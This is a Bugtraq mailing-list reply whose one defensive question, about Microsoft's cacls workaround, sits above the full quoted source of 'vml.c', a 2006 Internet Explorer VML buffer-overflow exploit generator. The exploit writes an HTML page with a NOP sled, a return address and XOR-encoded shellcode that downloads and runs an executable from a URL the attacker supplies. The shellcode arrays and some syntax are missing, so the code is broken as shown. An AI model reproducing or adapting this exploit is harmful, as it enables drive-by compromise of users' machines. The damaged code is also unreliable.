RE: vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit

Does the Microsoft suggested workaround, using cacls to remove the
"Everyone" group from the dll thwart this particular exploit?

-----Original Message-----
From: nop [mailto:nop@xxxxxxxx] 
Sent: Wednesday, September 20, 2006 2:03 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
* Copyright (C) 2006 XSec All Rights Reserved.
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:\>vml http://xsec.org/xxx.exe xxx.htm
* :

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

// Search Shellcode
unsigned char dc[] =

// Shellcode Start
unsigned char dcstart[] =

// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =

// Shellcode End
unsigned char dcend[] =

// HTML Header
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"v\\:* { behavior: url(#default#VML); }\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

char * footer =

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
int i=0;
unsigned int ncr = 0;

for(i=0; i<size; i+=2)
ncr = (buf[i+1] << 8) + buf[i];

fprintf(fp, "&#%d;", ncr);

void main(int argc, char **argv)
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;

unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;

if (argc < 2)
printf("Windows VML Download Exec Exploit\n");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org\n";);
//printf("!!! 0Day !!! Please Keep Private!!!\n");
printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);

url = argv[1];
if( (!strstr(url, "http://";) && !strstr(url, "ftp://";)) || strlen(url) <
10 || strlen(url) > MAXURL)
printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d
bytes.\n", MAXURL);

printf("[+] download url:%s\n", url);

if(argc >=3) file = argv[2];

printf("[+] exploit file:%s\n", file);

fp = fopen(file, "w+b");
//fp = fopen(file, "w");
printf("[-] Open file error!\n");

// print html header
fprintf(fp, "%s", header);

for(i=0; i<NOPSIZE; i++)
//fprintf(fp, "&#%d;", nop);
fprintf(fp, "A");


// print shellcode
memset(buf, 0x90, sizeof(buf));
//memset(buf, 0x90, NOPSIZE*2);

memcpy(buf, &ret, 4);
psize = 4+8+0x10;

memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(dc)-1;

memcpy(buf+psize, dcstart, 4);
psize += 4;

sc_len = sizeof(sc)-1;
memcpy(buf+psize, sc, sc_len);
psize += sc_len;

// print URL
memset(burl, 0, sizeof(burl));
strncpy(burl, url, 60);

for(i=0; i<strlen(url)+1; i++)
burl[i] = buf[i] ^ 0xee;

memcpy(buf+psize, burl, strlen(url)+1);
psize += strlen(url)+1;

memcpy(buf+psize, dcend, 4);
psize += 4;

// print NCR
convert2ncr(buf, psize);

printf("[+] buff size %d bytes\n", psize);

// print html footer
fprintf(fp, "%s", footer);

printf("[+] exploit write to %s success!\n", file);

